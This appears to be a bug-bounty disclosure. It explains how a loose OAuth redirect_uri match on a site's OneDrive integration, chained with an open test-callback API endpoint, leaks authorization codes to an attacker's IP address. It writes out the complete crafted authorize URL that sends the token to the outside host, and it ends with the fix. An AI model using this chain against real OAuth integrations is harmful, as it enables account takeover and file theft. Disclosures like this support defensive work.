Stealing Access Token of One-drive Integration By Chaining CSRF Vulnerability

Severity: High

Complexity: Easy

Weakness: partial 0Auth redirect_uri path

Step’s to Reproduce:

  1. Site have Third Party integration tab at site.com/integrations. They have one-drive integration .
  2. When we Click Activate on Onedrive integration.
  3. We Get Redirected to :

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/account/skydriveOAuthCallback&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access

From Above URL:

redirect_uri=https://www.site.com/account/skydriveOAuthCallback

4. So i started playing with redirect_uri=

I Found that redirect_uri is Accepting Anything After

redirect_uri=https://www.site.com/account/xxxxxxxxxx

5. This Confirm’s that they haven’t used Strict Path in redirect_uri Allowing anything after redirect_uri=https://www.site.com/account/*

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/xxxxxxxxxxx&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access

6. So Now Possible way’s to Exploit this to get Access token is by Finding Any Open Redirect Vulnerability. So I Keep Looking for Any OpenRedirect Endpoints in site.com to Exploit but no luck.

7. Next day Started reading their API Documentation .

And I Came Across :

GET /api/testCallback?callback_url=http://yoursite.com

which they used for Checking API Callback Request’s on your server.

8. So Finally We Got CSRF Vulnerability Which Make’s GET Request to Attacker’s Server.

&redirect_uri=https://www.site.com /api/testCallback?callback_url=http://52.66.158.189/?

Finally:

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com /api/testCallback?callback_url=http://52.66.158.189/?&scope=wl.basic+wl.skydrive+wl.skydrive_update+wl.offline_access

~ Success ~

exact path matches should be made instead of partial matches on redirect_uri .